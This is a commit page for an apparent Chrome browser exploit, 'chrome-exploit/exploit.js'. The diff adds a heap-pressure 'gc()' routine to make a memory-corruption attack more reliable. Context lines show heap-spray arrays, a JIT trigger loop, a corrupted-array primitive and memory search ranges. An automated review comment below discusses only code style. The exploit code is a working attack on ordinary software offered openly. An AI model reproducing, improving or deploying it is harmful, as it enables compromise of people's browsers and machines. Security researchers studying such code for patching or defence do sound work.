
Commit 457c8e8

author
r4j0x00
committed
increase exploit reliability
1 parent d3a2107 commit 457c8e8


1 file changed

+8
-0
lines changed


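--- a/chrome-exploit/exploit.js
+++ b/chrome-exploit/exploit.js
@@ -21,6 +21,12 @@ function itof(val) {
 return f64_buf[0];
 }
 
+function gc() {
+for (let i = 0; i < 100; i++) {
+new ArrayBuffer(0x100000);
+}
+}
+
 array = Array(0x40000).fill(1.1);
 args = Array(0x100 - 1).fill(array);
 args.push(Array(0x40000 - 4).fill(2.2));
@@ -48,6 +54,8 @@ function trigger(array) {
 for (let i = 0; i < 30000; ++i) {
 trigger(giant_array);
 }
+gc();
+
 corrupted_array = trigger(giant_array)[1];
 
 var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];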
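Review bot: The `gc()` helper added at new lines 24–28 has no comment, and its name claims more than the visible code does: the loop only allocates and drops 100 `ArrayBuffer`s of `0x100000` bytes and never calls a collector, so whether a collection has happened by the time the call at new line 57 returns is left to the engine. Both constants are unexplained magic numbers. I would add a header comment such as `// Allocates and discards 100 x 1 MiB ArrayBuffers to create heap pressure; does not itself force a collection.` so that someone analysing this file does not mistake it for an engine-provided `gc()`. The commit message also names no target build or bug reference, so a reader using this page to confirm a patch has to find that elsewhere in the repository.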
